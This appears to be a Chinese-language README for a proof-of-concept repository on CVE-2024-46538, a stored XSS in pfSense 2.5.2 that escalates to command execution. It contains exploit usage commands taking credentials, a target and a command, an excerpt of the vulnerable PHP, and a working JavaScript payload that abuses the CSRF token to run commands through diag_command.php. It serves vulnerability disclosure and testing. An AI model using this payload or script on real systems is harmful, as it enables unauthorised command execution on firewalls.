这篇文章是由 EQSTLab 发表的研究文章。
感谢 physicszq 发现了这个漏洞。
★ CVE-2024-46538 PfSense 存储型XSS导致任意代码执行PoC ★
https://github.com/user-attachments/assets/f41d0945-b7f4-4f88-bac5-265904256aae
CVE-2024-46538:PfSense 存储型XSS漏洞
描述:pfsense v2.5.2 中存在一个跨站脚本(XSS)漏洞,攻击者可以通过向 interfaces_groups_edit.php 中的 $pconfig 变量注入恶意载荷,执行任意 Web 脚本或 HTML。
下载存在漏洞的版本(v2.5.2):
在 Oracle Virtual Box 上运行
1. 创建虚拟机

2. 设置适配器1、2如下:

3. 设置启动顺序如下:

4. 按以下指引操作:

git clone https://github.com/EQSTLab/CVE-2024-46538.git
cd CVE-2024-46538
pip install -r requirements.txt
# 存储恶意JavaScript载荷(无自定义JS服务器)
python3 CVE-2024-46538.py -i <USER_ID> -p <USER_PASSWORD> -u <URL_TO_EXPLOIT> -c <CMD_TO_EXECUTE>
# 存储恶意JavaScript载荷(使用自定义JS服务器)
python3 CVE-2024-46538.py -j <CUSTOM_JAVASCRIPT_SERVER> -i <USER_ID> -p <USER_PASSWORD> -u <URL_TO_EXPLOIT> -c <CMD_TO_EXECUTE>
CVE-2024-46538.py

/src/usr/local/www/interfaces_groups_edit.php
if (isset($_POST['members'])) {
$members = implode(" ", $_POST['members']);
} else {
$members = "";
}
...
// 创建新组
} else {
$ifgroupentry['ifname'] = $_POST['ifname'];
$a_ifgroups[] = $ifgroupentry;
}
write_config("Interface Group added");
interface_group_setup($ifgroupentry);
header("Location: interfaces_groups.php");
exit;
} else {
$pconfig['descr'] = $_POST['descr'];
$pconfig['members'] = $members;
}
}
interfaces_groups_edit.php 中的 $pconfig 变量缺乏过滤,导致跨站脚本(XSS)漏洞。该跨站脚本漏洞允许攻击者利用 diag_command.php 端点对管理员执行任意命令。 例如,以下JavaScript可能导致任意代码执行。
mal.js
var formData = new FormData();formData.append("__csrf_magic", csrfMagicToken);formData.append("txtCommand", "id");formData.append("txtRecallBuffer", "id");formData.append("submit", "EXEC");formData.append("dlPath", "");formData.append("ulfile", new Blob(), "");formData.append("txtPHPCommand", "");fetch("https://192.168.102.61/diag_command.php", {method: "POST",body: formData}).then(response => response.text()).then(data => {const parser = new DOMParser();const doc = parser.parseFromString(data, "text/html");const contentDiv = doc.querySelector("div.content");if (contentDiv) {alert(contentDiv.textContent);} else {alert("No content found");}})
用户(拥有权限:WebCfg - Interfaces: Groups: Edit)--(存储恶意JavaScript代码)--> 管理员(拥有执行代码的权限)--(访问 interfaces_groups.php)--> JavaScript代码执行 --> 代码执行
此仓库并非旨在成为 CVE-2024-46538 的 XSS 漏洞利用工具。本项目的目的是帮助人们了解此漏洞,并可能用于测试他们自己的应用程序。
https://github.com/physicszq/web_issue/blob/main/pfsense/interfaces_groups_edit_file.md_xss.md